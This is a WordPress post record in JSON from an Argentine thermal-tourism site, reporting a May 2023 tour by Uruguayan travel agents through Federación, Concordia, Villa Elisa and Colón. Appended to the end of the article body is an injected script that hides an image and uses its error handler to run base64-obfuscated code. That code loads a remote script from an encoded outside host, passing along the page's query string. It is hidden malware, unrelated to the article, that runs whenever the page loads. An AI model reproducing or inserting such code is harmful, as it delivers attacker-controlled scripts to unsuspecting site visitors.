{"id":6803,"date":"2023-05-19T10:43:56","date_gmt":"2023-05-19T13:43:56","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6803"},"modified":"2025-08-13T16:00:01","modified_gmt":"2025-08-13T19:00:01","slug":"se-realizo-un-nuevo-fam-tour-para-agencias-de-turismo-uruguayas","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6803","title":{"rendered":"Se realizo un nuevo Fam Tour para agencias de turismo Uruguayas"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>Invitados por el Instituto Nacional de Promoci\u00f3n Tur\u00edstica y la Secretar\u00eda de Turismo de Entre R\u00edos, operadores tur\u00edsticos de Uruguay visitaron esta semana nuestra provincia y recorrieron varias localidades.<\/em><\/h3>\n\n\n\n<p>Un grupo de operadores tur\u00edsticos de Uruguay, visitaron la provincia como parte de un fam tour para promocionar los atractivos y las propuestas tur\u00edsticas.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-1024x512.jpg\" alt=\"Publicidad\" class=\"wp-image-6698\" width=\"442\" height=\"221\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-1024x512.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-300x150.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-768x384.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-696x348.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-1068x534.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-840x420.jpg 840w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-320x160.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-480x240.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-800x400.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1.jpg 1440w\" sizes=\"(max-width: 442px) 100vw, 442px\" \/><\/a><figcaption class=\"wp-element-caption\">                                     <em><mark>Publicidad<\/mark><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>La coordinaci\u00f3n estuvo a cargo de la secretar\u00eda de Turismo de Entre R\u00edos con la colaboraci\u00f3n de las \u00e1reas municipales de turismo de las ciudades por donde se hizo el recorrido.<\/p>\n\n\n\n<p>El objetivo fue conocer las principales actividades tur\u00edsticas de ciudades como Federaci\u00f3n, Concordia, Villa Elisa y Col\u00f3n.<\/p>\n\n\n\n<p>El contingente arrib\u00f3 a Federaci\u00f3n el martes a la noche.&nbsp;El mi\u00e9rcoles hubo un desayuno de trabajo con personal de turismo y representantes del sector privado, para luego recorrer la zona de Costanera, el museo de los Asentamientos, un almuerzo en La Generosa y el complejo termal por la tarde.<br><br>El jueves en Concordia realiz\u00f3 un city tour en el Bus Tur\u00edstico, pasando por el Castillo San Carlos y luego la Represa de Salto Grande.&nbsp;El responsable de Turismo Aldo \u00c1lvarez los recibi\u00f3 antes de comenzar las actividades y les brind\u00f3 una charla en el centro de informes.&nbsp;El almuerzo se realiz\u00f3 en Estancia La Ang\u00e9lica, con m\u00fasica en vivo.<br><br>El viernes en Villa Elisa, la responsable de turismo Eliana Francou, brind\u00f3 una charla informativa para los agentes de viajes en el hotel Plaza San Mart\u00edn.&nbsp;Luego conocieron la iglesia Virgen Ni\u00f1a, el Monumento al Sembrador y se trasladaron al complejo Termas Villa Elisa.<br><br>Para terminar la visita, el s\u00e1bado en la ciudad de Col\u00f3n recorrieron el r\u00edo Uruguay, un city tour por la ciudad, Termas Col\u00f3n y la Bodega Vulliez Sermet.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_19-5-2023_10332_www.entrerios.tur_.ar_.jpeg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_19-5-2023_10332_www.entrerios.tur_.ar_.jpeg\" alt=\"\" class=\"wp-image-6804\" width=\"278\" height=\"72\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_19-5-2023_10332_www.entrerios.tur_.ar_.jpeg 425w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_19-5-2023_10332_www.entrerios.tur_.ar_-300x78.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_19-5-2023_10332_www.entrerios.tur_.ar_-320x83.jpeg 320w\" sizes=\"(max-width: 278px) 100vw, 278px\" \/><\/a><figcaption class=\"wp-element-caption\">Fuente:<\/figcaption><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li><\/li>\n<\/ul>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Invitados por el Instituto Nacional de Promoci\u00f3n Tur\u00edstica y la Secretar\u00eda de Turismo de Entre R\u00edos, operadores tur\u00edsticos de Uruguay visitaron esta semana nuestra provincia y recorrieron varias localidades. Un grupo de operadores tur\u00edsticos de Uruguay, visitaron la provincia como parte de un fam tour para promocionar los atractivos y las propuestas tur\u00edsticas. La coordinaci\u00f3n [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6805,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[17],"tags":[],"class_list":["post-6803","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-turismo-termal"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6803","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6803"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6803\/revisions"}],"predecessor-version":[{"id":10398,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6803\/revisions\/10398"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6805"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6803"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6803"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6803"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}